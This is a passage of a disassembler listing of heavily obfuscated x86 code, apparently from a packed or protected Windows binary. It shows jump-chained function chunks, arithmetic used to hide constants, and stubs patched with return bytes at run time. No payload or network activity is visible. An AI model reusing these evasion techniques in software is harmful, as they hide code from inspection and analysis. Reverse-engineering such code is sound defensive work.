; START OF FUNCTION CHUNK FOR sub_440493
loc_443493: ; CODE XREF: sub_440493+12617j
jmp loc_43A0F1
; END OF FUNCTION CHUNK FOR sub_440493
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446258
loc_443498: ; CODE XREF: sub_446258+1j
jmp loc_43F14B
; END OF FUNCTION CHUNK FOR sub_446258
; ---------------------------------------------------------------------------
loc_44349D: ; CODE XREF: ut7h7i2x:loc_455D15j
xchg ecx, [esp]
mov edx, ecx
pop ecx
lea eax, nullsub_123
jmp loc_445650
; ---------------------------------------------------------------------------
loc_4434AE: ; CODE XREF: ut7h7i2x:0044E44Dj
mov edx, eax
xchg edi, [esp]
mov eax, edi
pop edi
mov eax, [esp]
push offset loc_446E11
jmp loc_444EDA
; ---------------------------------------------------------------------------
loc_4434C3: ; CODE XREF: ut7h7i2x:0044358Fj
; DATA XREF: sub_43D3E7+18o
call sub_44ED9F
push ebx
push 1A9CA086h
pop ebx
and ebx, 0A43A031Bh
or ebx, ds:4000FAh
add ebx, 7BEEBC87h
add ebx, ebp
jmp loc_448CB7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44917B
loc_4434E8: ; CODE XREF: sub_44917B:loc_44733Ej
mov ds:dword_41D18C, eax
call sub_43D688
loc_4434F3: ; CODE XREF: sub_4443DE:loc_453998j
jmp nullsub_196
; END OF FUNCTION CHUNK FOR sub_44917B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4417AF
loc_4434F8: ; CODE XREF: sub_4417AF-7774j
jmp loc_447D6E
; END OF FUNCTION CHUNK FOR sub_4417AF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43EF73
loc_4434FD: ; CODE XREF: sub_43EF73:loc_45415Bj
add eax, 0C239DD46h
push offset loc_442783
jmp loc_449C43
; END OF FUNCTION CHUNK FOR sub_43EF73
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4561CA
loc_44350D: ; CODE XREF: sub_4561CA+5j
mov ebp, esp
add esp, 0FFFFFFD8h
mov [ebp-20h], eax
mov eax, [ebp-20h]
mov [ebp-28h], eax
mov dword ptr [ebp-14h], 4
jmp loc_4504D7
; END OF FUNCTION CHUNK FOR sub_4561CA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F7A5
loc_443527: ; CODE XREF: sub_43F7A5:loc_459612j
jz loc_451FD7
jmp loc_453B56
; END OF FUNCTION CHUNK FOR sub_43F7A5
; ---------------------------------------------------------------------------
loc_443532: ; CODE XREF: ut7h7i2x:00441DF2j
jno loc_43DB9E
xor ebp, 0C7833DF3h
loc_44353E: ; CODE XREF: ut7h7i2x:004416B8j
or esi, ds:4000F6h
add esi, 4ED22551h
jmp loc_43D534
; ---------------------------------------------------------------------------
loc_44354F: ; DATA XREF: sub_45AA08+10o
add ebx, 0A57BA179h
sub eax, ebx
pop ebx
rol eax, 11h
add eax, 12E9A168h
rol eax, 1Ch
jmp loc_43911A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4462B0
loc_443569: ; CODE XREF: sub_4462B0j
mov eax, ds:dword_44B964
or eax, eax
jmp loc_4597FA
; END OF FUNCTION CHUNK FOR sub_4462B0
; ---------------------------------------------------------------------------
loc_443576: ; CODE XREF: ut7h7i2x:loc_43B030j
; ut7h7i2x:00455913j
add edi, 29271496h
xchg edi, [esp]
jmp nullsub_364
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446F56
loc_443584: ; CODE XREF: sub_446F56:loc_44247Fj
jz loc_44BEA8
loc_44358A: ; CODE XREF: sub_44D5BE-30D3j
jmp loc_449491
; END OF FUNCTION CHUNK FOR sub_446F56
; ---------------------------------------------------------------------------
ja loc_4434C3
push edx
jmp loc_44BE9F
; ---------------------------------------------------------------------------
loc_44359B: ; CODE XREF: ut7h7i2x:0044739Dj
jz loc_4477F3
jmp loc_452A5A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446215
loc_4435A6: ; CODE XREF: sub_446215-CBCFj
and esi, 0D5CC565Eh
rol esi, 0Dh
add esi, 0F83BACE7h
xchg esi, [esp+4+var_4]
jmp sub_4445DC
; END OF FUNCTION CHUNK FOR sub_446215
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45854D
loc_4435BD: ; CODE XREF: sub_45854D:loc_43D76Cj
jge loc_44CAD7
; END OF FUNCTION CHUNK FOR sub_45854D
; START OF FUNCTION CHUNK FOR sub_455060
loc_4435C3: ; CODE XREF: sub_455060-15294j
jmp loc_44A621
; END OF FUNCTION CHUNK FOR sub_455060
; ---------------------------------------------------------------------------
xor esi, 96912C39h
xor ebx, 7B9B18ABh
jmp loc_450B4E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44937E
loc_4435D9: ; CODE XREF: sub_44937E+3F91j
jnp loc_43B65E
sbb eax, 732015Ch
mov ebx, 9D49D1Ah
jge loc_44FBB8
jmp loc_458001
; END OF FUNCTION CHUNK FOR sub_44937E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E5DC
loc_4435F5: ; CODE XREF: sub_44E5DC:loc_454C3Bj
xor eax, 0D0113BAh
add eax, ebp
add eax, 1BDDF6EEh
mov eax, [eax]
push offset loc_45A5E2
jmp loc_4457C0
; END OF FUNCTION CHUNK FOR sub_44E5DC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457E3D
loc_44360F: ; CODE XREF: sub_457E3D-116FAj
sub ecx, 23A7AABh
xor ecx, 29166B8Fh
sub ecx, 18EE092Bh
add ecx, 0B0F40198h
xchg ecx, [esp+0]
jmp loc_4530B8
; END OF FUNCTION CHUNK FOR sub_457E3D
; ---------------------------------------------------------------------------
loc_44362F: ; CODE XREF: ut7h7i2x:0044A1D1j
test eax, 0C538E22Ah
jmp loc_443A71
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4565B2
loc_44363A: ; CODE XREF: sub_4565B2-5488j
mov eax, [ebp-10h]
push ebp
mov ebp, edx
xchg ebp, [esp+4+var_4]
push 52321DEh
jmp loc_454D51
; END OF FUNCTION CHUNK FOR sub_4565B2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447CBE
loc_44364D: ; CODE XREF: sub_447CBE:loc_455DFFj
rol edi, 0Dh
jp loc_4491D9
loc_443656: ; CODE XREF: sub_440CEC:loc_456B58j
jmp loc_446C23
; END OF FUNCTION CHUNK FOR sub_447CBE
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_271. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_44365C: ; CODE XREF: ut7h7i2x:00448E20j
jmp loc_43EC16
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43FF2B
loc_443661: ; CODE XREF: sub_43FF2B+Dj
jmp loc_4452B6
; END OF FUNCTION CHUNK FOR sub_43FF2B
; =============== S U B R O U T I N E =======================================
sub_443666 proc near ; DATA XREF: sub_443DCC+Ao
jz loc_44CF26
mov dword ptr [ebp-8], 1
loc_443673: ; CODE XREF: sub_439C85+DCF9j
; sub_439C85+132A6j
mov eax, [ebp-8]
pop ecx
pop ecx
pop ebp
retn
sub_443666 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_451A7D
loc_44367A: ; CODE XREF: sub_451A7D-5C5Cj
jmp sub_43AA94
; END OF FUNCTION CHUNK FOR sub_451A7D
; ---------------------------------------------------------------------------
loc_44367F: ; DATA XREF: sub_44C9F5-74E4o
push 637FACC3h
; START OF FUNCTION CHUNK FOR sub_444851
loc_443684: ; CODE XREF: sub_444851:loc_441E09j
pop edx
add edx, 1B4D4689h
sub edx, 52588EEBh
xor edx, 58841E1Bh
rol edx, 8
xor edx, 0E050FD8h
add edx, ebp
jmp loc_444075
; END OF FUNCTION CHUNK FOR sub_444851
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AB62
loc_4436A7: ; CODE XREF: sub_43AB62+Cj
jnz loc_45451C
jmp loc_44A18E
; END OF FUNCTION CHUNK FOR sub_43AB62
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44DB48
loc_4436B2: ; CODE XREF: sub_44DB48:loc_43C448j
pop edi
mov eax, 1
shl eax, cl
mov edx, [ebp-1Ch]
shr edx, 3
push 0B72B93A3h
jmp loc_44C1CD
; END OF FUNCTION CHUNK FOR sub_44DB48
; ---------------------------------------------------------------------------
loc_4436CA: ; CODE XREF: ut7h7i2x:004582F1j
cmp ecx, ebx
jmp loc_44DDB2
; ---------------------------------------------------------------------------
loc_4436D1: ; CODE XREF: ut7h7i2x:00444B00j
push esi
mov esi, edx
xchg esi, [esp]
call sub_456520
mov eax, 5389CFC1h
call sub_450A55
loc_4436E6: ; CODE XREF: ut7h7i2x:0044E73Fj
jmp loc_44371C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439D5C
loc_4436EB: ; CODE XREF: sub_439D5C+17066j
jnz loc_43FC72
jmp loc_455473
; END OF FUNCTION CHUNK FOR sub_439D5C
; =============== S U B R O U T I N E =======================================
sub_4436F6 proc near ; DATA XREF: sub_442B3B+Co
; FUNCTION CHUNK AT 0044DFD2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004500A3 SIZE 0000000E BYTES
mov eax, [ebp-4]
movzx eax, byte ptr [eax]
mov edx, [ebp+8]
mov [edx-10h], eax
inc dword ptr [ebp-4]
jmp loc_44DFD2
sub_4436F6 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_454B2B
loc_44370A: ; CODE XREF: sub_454B2B:loc_43BCFFj
cdq
jl loc_44087A
xor edi, 1FE7FB52h
jmp loc_45025D
; END OF FUNCTION CHUNK FOR sub_454B2B
; ---------------------------------------------------------------------------
loc_44371C: ; CODE XREF: ut7h7i2x:loc_4436E6j
mov edx, eax
call sub_43F058
jmp loc_439FE2
; ---------------------------------------------------------------------------
loc_443728: ; CODE XREF: ut7h7i2x:00444434j
mov edx, ds:dword_4502B8
push offset loc_447210
jmp locret_44BDEA
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_48. PRESS KEYPAD "+" TO EXPAND]
db 98h, 80h, 0BFh
dword_44373C dd 0FCC2D34Eh ; DATA XREF: sub_43B83C+1D23Cr
dword_443740 dd 132EFCF4h ; DATA XREF: sub_439AE7+5C62r
; ut7h7i2x:0044AF2Aw
; ---------------------------------------------------------------------------
loc_443744: ; CODE XREF: ut7h7i2x:004572A2j
jmp locret_43930D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44CBC2
loc_443749: ; CODE XREF: sub_44CBC2-13A57j
jmp loc_43CA25
; END OF FUNCTION CHUNK FOR sub_44CBC2
; ---------------------------------------------------------------------------
dw 0F2ACh
dword_443750 dd 7BBF38B3h ; DATA XREF: sub_44B789:loc_44AA43r
; ut7h7i2x:004556AFw
; ---------------------------------------------------------------------------
loc_443754: ; CODE XREF: ut7h7i2x:0045A4B6j
jmp loc_45317D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AB62
loc_443759: ; CODE XREF: sub_43AB62+11AF7j
jmp loc_442797
; END OF FUNCTION CHUNK FOR sub_43AB62
; ---------------------------------------------------------------------------
loc_44375E: ; CODE XREF: ut7h7i2x:00442374j
jmp loc_44E4B2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449FD5
loc_443763: ; CODE XREF: sub_449FD5-E6C4j
jmp loc_448056
; END OF FUNCTION CHUNK FOR sub_449FD5
; ---------------------------------------------------------------------------
dword_443768 dd 0CDA8DDF9h ; DATA XREF: sub_44092D+15137r
; ut7h7i2x:0045A9B9w
; ---------------------------------------------------------------------------
loc_44376C: ; CODE XREF: ut7h7i2x:004409C2j
jmp loc_439554
; ---------------------------------------------------------------------------
dec eax
xor esi, [ecx-0FBB8819h]
loc_443778: ; CODE XREF: ut7h7i2x:0045A6FAj
jmp loc_455F8D
; ---------------------------------------------------------------------------
db 1Ah, 4Bh, 9Ch
dword_443780 dd 0 ; DATA XREF: sub_43C1D2r
; sub_43BE93:loc_43D16Fw ...
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446320
loc_443784: ; CODE XREF: sub_446320+Cj
jmp loc_458CEB
; END OF FUNCTION CHUNK FOR sub_446320
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4596E5
loc_443789: ; CODE XREF: sub_4596E5:loc_455193j
push offset loc_4495FC
jmp nullsub_387
; END OF FUNCTION CHUNK FOR sub_4596E5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444AA3
loc_443793: ; CODE XREF: sub_444AA3:loc_43D627j
pop ecx
add ecx, 22BA683Ah
xor ecx, 0CED1864Fh
sub eax, ecx
pop ecx
rol eax, 0Ah
jmp loc_43B3AB
; END OF FUNCTION CHUNK FOR sub_444AA3
; ---------------------------------------------------------------------------
test eax, eax
jz loc_456C0D
jmp loc_448C35
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459070
loc_4437B8: ; CODE XREF: sub_459070-1ABB9j
push esi
push 0FDFE2B93h
pop esi
sub esi, 0D1252EC4h
jmp loc_45563B
; END OF FUNCTION CHUNK FOR sub_459070
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F1B2
loc_4437CA: ; CODE XREF: sub_43F1B2+1860Bj
test ebp, edx
jmp loc_442F50
; END OF FUNCTION CHUNK FOR sub_43F1B2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4497C1
loc_4437D1: ; CODE XREF: sub_4497C1-654Ej
adc esi, edi
loc_4437D3: ; CODE XREF: sub_4497C1:loc_443260j
and edx, 956FD0D8h
rol edx, 17h
add edx, 9BF976EBh
xchg edx, [esp+4+var_4]
jmp loc_45A831
; END OF FUNCTION CHUNK FOR sub_4497C1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452B14
loc_4437EA: ; CODE XREF: sub_452B14:loc_4570F8j
mov ebx, [esi]
xchg ebx, edx
jmp loc_43ED88
; END OF FUNCTION CHUNK FOR sub_452B14
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CFB6
loc_4437F3: ; CODE XREF: sub_43CFB6:loc_44EB53j
xor esi, 9D0204C8h
sub esi, 2AB5040Fh
and esi, 963D22D8h
xor esi, 31A14071h
jmp loc_43B421
; END OF FUNCTION CHUNK FOR sub_43CFB6
; ---------------------------------------------------------------------------
loc_443810: ; CODE XREF: ut7h7i2x:00446E1Bj
jnz loc_457D2E
; =============== S U B R O U T I N E =======================================
sub_443816 proc near ; CODE XREF: sub_441C0E:loc_455A04p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0043B415 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043BD0E SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0043C433 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448E71 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 00448F84 SIZE 00000028 BYTES
; FUNCTION CHUNK AT 0045355E SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00454498 SIZE 0000000D BYTES
xchg ebx, [esp+0]
pop ebx
mov eax, [eax]
xor edx, edx
push ebp
not ebp
jmp loc_454498
sub_443816 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
sub edx, ebx
jmp loc_455E09
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B847
loc_44382D: ; CODE XREF: sub_43B847:loc_453695j
; ut7h7i2x:004536ACj
rol edi, 1
xor edi, 89ED7BD7h
add edi, ebp
add edi, 0D94D6FBAh
jmp loc_44AAC2
; END OF FUNCTION CHUNK FOR sub_43B847
; ---------------------------------------------------------------------------
loc_443842: ; CODE XREF: ut7h7i2x:00453183j
pushf
jp loc_44B521
rol ebx, 15h
adc edx, ebx
xchg ebp, [esi]
jmp loc_456C05
; ---------------------------------------------------------------------------
loc_443855: ; CODE XREF: ut7h7i2x:00451C02j
mov ebp, esp
push ecx
mov esp, ebp
pop ebp
push 79F294F2h
adc eax, ebp
jmp loc_443A88
; ---------------------------------------------------------------------------
loc_443867: ; CODE XREF: ut7h7i2x:00440EACj
add esi, 0F6ABCC95h
; =============== S U B R O U T I N E =======================================
sub_44386D proc near ; CODE XREF: sub_442319+Ap
; FUNCTION CHUNK AT 0044E4DD SIZE 00000006 BYTES
; FUNCTION CHUNK AT 004587F5 SIZE 00000012 BYTES
xchg edi, [esp+0]
pop edi
loc_443871: ; CODE XREF: ut7h7i2x:loc_4504E6j
add eax, ebp
jmp loc_4587F5
sub_44386D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43D989
loc_443878: ; CODE XREF: sub_43D989:loc_44A37Aj
xchg esi, [esp+4+var_4]
mov ebp, esp
push ecx
mov esp, ebp
pop ebp
mov eax, ds:dword_44880C
jmp loc_44AF31
; END OF FUNCTION CHUNK FOR sub_43D989
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DBEC
loc_44388C: ; CODE XREF: ut7h7i2x:0043E8F6j
; sub_43DBEC+11B17j
mov eax, ebx
xor eax, 10398D07h
mov ecx, 50E0963Eh
loc_443899: ; CODE XREF: sub_43DBEC:loc_43AE52j
push 703C3E70h
pop eax
sub eax, 53428F7Ah
jmp loc_44BD10
; END OF FUNCTION CHUNK FOR sub_43DBEC
; ---------------------------------------------------------------------------
loc_4438AA: ; CODE XREF: ut7h7i2x:0045361Cj
js loc_448E00
jl loc_44D3D5
pop edi
jmp loc_43D9D2
; =============== S U B R O U T I N E =======================================
sub_4438BC proc near ; CODE XREF: ut7h7i2x:00439884j
; ut7h7i2x:00457C5Ap
xchg eax, [esp+0]
pop eax
mov [edx], al
mov eax, [ebp-8]
jmp loc_455485
sub_4438BC endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_4438CA: ; CODE XREF: ut7h7i2x:loc_445153j
jnz loc_448EE6
; START OF FUNCTION CHUNK FOR sub_43DBEC
loc_4438D0: ; CODE XREF: sub_43DBEC+1B96Ej
jmp loc_4528E5
; END OF FUNCTION CHUNK FOR sub_43DBEC
; ---------------------------------------------------------------------------
not ebx
adc edx, 3911255Bh
sbb eax, ecx
jmp loc_448EE6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455DCD
loc_4438E4: ; CODE XREF: sub_455DCD:loc_447680j
jz loc_4455E4
jmp loc_43D3D0
; END OF FUNCTION CHUNK FOR sub_455DCD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B45E
loc_4438EF: ; CODE XREF: sub_44B45E+F0B0j
test ecx, 0BBAA475Fh
jmp loc_453AFF
; END OF FUNCTION CHUNK FOR sub_44B45E
; ---------------------------------------------------------------------------
loc_4438FA: ; CODE XREF: ut7h7i2x:0044A263j
lea eax, nullsub_151
mov byte ptr [eax], 0C3h
jmp loc_45520E
; ---------------------------------------------------------------------------
pop edx
mov eax, [esp]
jmp loc_43BC9C
; ---------------------------------------------------------------------------
loc_443911: ; DATA XREF: sub_445277o
pop edx
jz loc_44D52F
mov eax, [esp]
push esi
jmp loc_449C04
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45633E
loc_443921: ; CODE XREF: sub_45633E-10A49j
js loc_459A93
loc_443927: ; CODE XREF: sub_45633E:loc_44BA49j
mov eax, 1D403CB1h
call sub_4401C1
loc_443931: ; CODE XREF: sub_453139-9716j
jmp loc_4412BC
; END OF FUNCTION CHUNK FOR sub_45633E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C595
loc_443936: ; CODE XREF: sub_44C595:loc_44893Ej
rol edi, 10h
test edi, 4000000h
jmp loc_44A074
; END OF FUNCTION CHUNK FOR sub_44C595
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446CA0
loc_443944: ; CODE XREF: sub_446CA0:loc_45369Bj
sbb eax, 9B083C38h
jmp loc_44EEDB
; END OF FUNCTION CHUNK FOR sub_446CA0
; ---------------------------------------------------------------------------
push 0F560F287h
pop eax
sub eax, 0AE14EC9Eh
xor eax, 3AEAA929h
call sub_43AA94
push offset sub_45932A
jmp loc_454F86
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43FF65
loc_443970: ; CODE XREF: sub_43FF65+16068j
xor ebx, 325B34D0h
jns loc_456FA5
; END OF FUNCTION CHUNK FOR sub_43FF65
; START OF FUNCTION CHUNK FOR sub_44937E
loc_44397C: ; CODE XREF: sub_44937E+1798j
jmp loc_449B67
; END OF FUNCTION CHUNK FOR sub_44937E
; ---------------------------------------------------------------------------
pop ebx
jmp loc_456F9E
; ---------------------------------------------------------------------------
mov ds:off_41D030, eax
lea eax, sub_43C39B
mov byte ptr [eax], 0C3h
jmp loc_449EDC
; =============== S U B R O U T I N E =======================================
sub_44399B proc near ; CODE XREF: sub_41A06E+19p
; sub_44399B+5j
; DATA XREF: ...
call sub_4545FB
jmp ds:off_41D034
sub_44399B endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449D3B
loc_4439A6: ; CODE XREF: sub_449D3B:loc_43DDEAj
jmp loc_4479A8
; END OF FUNCTION CHUNK FOR sub_449D3B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4545D8
loc_4439AB: ; CODE XREF: sub_4545D8-1AE00j
jmp loc_43DCE6
; END OF FUNCTION CHUNK FOR sub_4545D8
; =============== S U B R O U T I N E =======================================
sub_4439B0 proc near ; CODE XREF: sub_44CE09-1121Bj
; sub_4489DF:loc_44173Aj ...
; FUNCTION CHUNK AT 0043A458 SIZE 00000005 BYTES
push ebp
push offset loc_4391E6
jmp loc_43A458
sub_4439B0 endp
; ---------------------------------------------------------------------------
loc_4439BB: ; CODE XREF: ut7h7i2x:004462D8j
mov byte ptr [eax], 0C3h
jmp loc_44963D
; ---------------------------------------------------------------------------
call nullsub_524
jmp ds:dword_41D0C8
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_524. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
sub al, 24h
mov edx, ebp
xchg eax, [esp]
call sub_44A35A
; START OF FUNCTION CHUNK FOR sub_44E84C
loc_4439DB: ; CODE XREF: sub_44E84C+11j
jmp loc_45504E
; END OF FUNCTION CHUNK FOR sub_44E84C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_374. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44A33F
loc_4439E1: ; CODE XREF: sub_44A33F:loc_43A0B7j
; sub_44A33F-1027Dj
add edx, 0A6B068D5h
xchg edx, [esp+0]
jmp loc_441729
; END OF FUNCTION CHUNK FOR sub_44A33F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A556
loc_4439EF: ; CODE XREF: sub_43A556:loc_43FEDEj
; sub_43A556+18D33j
lea eax, [ebp-2BBh]
cmp dword ptr [eax], 47424454h
jz loc_456EB1
jmp loc_4544D5
; END OF FUNCTION CHUNK FOR sub_43A556
; =============== S U B R O U T I N E =======================================
sub_443A06 proc near ; CODE XREF: sub_44640F:loc_44C488p
; ut7h7i2x:004583A6j
; FUNCTION CHUNK AT 00439ACE SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0043F9B9 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044FA45 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00453141 SIZE 00000012 BYTES
xchg edx, [esp+0]
pop edx
push 0DE93A93Bh
pop eax
or eax, 856A7288h
sub eax, ds:4000FBh
jmp loc_453141
sub_443A06 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_443A21 proc near ; CODE XREF: ut7h7i2x:00449DD3j
; sub_44EBD9+5p
; FUNCTION CHUNK AT 00449BC6 SIZE 00000022 BYTES
xchg ebx, [esp+0]
loc_443A24: ; CODE XREF: ut7h7i2x:loc_443B44j
pop ebx
mov edx, [ebp+8]
mov eax, [edx]
push edi
push 17DCF454h
pop edi
jmp loc_449BC6
sub_443A21 endp
; ---------------------------------------------------------------------------
loc_443A36: ; CODE XREF: ut7h7i2x:00453975j
push 4903671Eh
pop ecx
rol ecx, 0Dh
jnb loc_43CE61
; =============== S U B R O U T I N E =======================================
sub_443A45 proc near ; CODE XREF: sub_44871F-C22p
; ut7h7i2x:004502E5j
; FUNCTION CHUNK AT 0043B46D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043F276 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00440A78 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00441E84 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044264B SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00443427 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444AC1 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044B1D3 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044EDDB SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004508D6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451351 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00454D9C SIZE 00000029 BYTES
xchg ebx, [esp+0]
pop ebx
pop edi
loc_443A4A: ; CODE XREF: ut7h7i2x:loc_447FC6j
; sub_44B1E7:loc_448BF3j
jno loc_43F276
cmp dword ptr [ebp-4], 0
jnz loc_44B420
jmp loc_443427
sub_443A45 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4433C5
loc_443A5F: ; CODE XREF: sub_4433C5:loc_440F2Ej
; ut7h7i2x:0044744Ej
add ebx, 0D247AC71h
; END OF FUNCTION CHUNK FOR sub_4433C5
; =============== S U B R O U T I N E =======================================
sub_443A65 proc near ; CODE XREF: sub_4588BA-162B4p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 0043CB30 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D1A0 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0043F660 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004419BB SIZE 0000002B BYTES
; FUNCTION CHUNK AT 0044D885 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044F5D9 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0045A444 SIZE 00000005 BYTES
xchg ecx, [esp+0]
pop ecx
xchg edx, [esp-4+arg_0]
jmp loc_45A444
sub_443A65 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_443A71: ; CODE XREF: ut7h7i2x:00443635j
jnb loc_452B44
shl edx, 6
ror edi, 16h
jmp loc_454414
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_486. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449700
loc_443A83: ; CODE XREF: sub_449700+1D38j
jmp loc_439A5E
; END OF FUNCTION CHUNK FOR sub_449700
; ---------------------------------------------------------------------------
loc_443A88: ; CODE XREF: ut7h7i2x:00443862j
jmp loc_4468A6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452CBB
loc_443A8D: ; CODE XREF: sub_452CBB-1055Aj
jmp loc_44BC32
; END OF FUNCTION CHUNK FOR sub_452CBB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4529E0
loc_443A92: ; CODE XREF: sub_4529E0-15E3Dj
jmp loc_445882
; END OF FUNCTION CHUNK FOR sub_4529E0
; ---------------------------------------------------------------------------
and esi, 6F8E091Dh
jmp sub_43B9B1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4503C3
loc_443AA2: ; CODE XREF: sub_4503C3+7319j
xchg edi, edx
push 3C756FE7h
loc_443AA9: ; CODE XREF: sub_4503C3:loc_459FFDj
push offset sub_442DA3
jmp loc_45735A
; END OF FUNCTION CHUNK FOR sub_4503C3
; =============== S U B R O U T I N E =======================================
sub_443AB3 proc near ; CODE XREF: ut7h7i2x:00443C7Cj
; sub_451C98+5p
xchg edx, [esp+0]
pop edx
push 0B61E04A9h
sub_443AB3 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_43F0B0
loc_443ABC: ; CODE XREF: sub_43F0B0:loc_44FEC4j
pop ebx
sub ebx, 0EC978F70h
jmp loc_440F7A
; END OF FUNCTION CHUNK FOR sub_43F0B0
; ---------------------------------------------------------------------------
jmp ds:dword_41D138
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CE34
loc_443ACE: ; CODE XREF: sub_43CE34+9313j
; sub_449E81+64BFj
jmp $+5
; END OF FUNCTION CHUNK FOR sub_43CE34
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_41. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
jns loc_450345
call sub_455DE7
; START OF FUNCTION CHUNK FOR sub_4589E0
loc_443ADF: ; CODE XREF: sub_4589E0-13DEBj
jnz loc_442A05
jmp loc_44C3E2
; END OF FUNCTION CHUNK FOR sub_4589E0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442B3B
loc_443AEA: ; CODE XREF: sub_442B3B-2DEj
and esi, 0EA7875E0h
loc_443AF0: ; CODE XREF: sub_442B3B:loc_442BD4j
push 0A4302803h
pop eax
rol eax, 0Ch
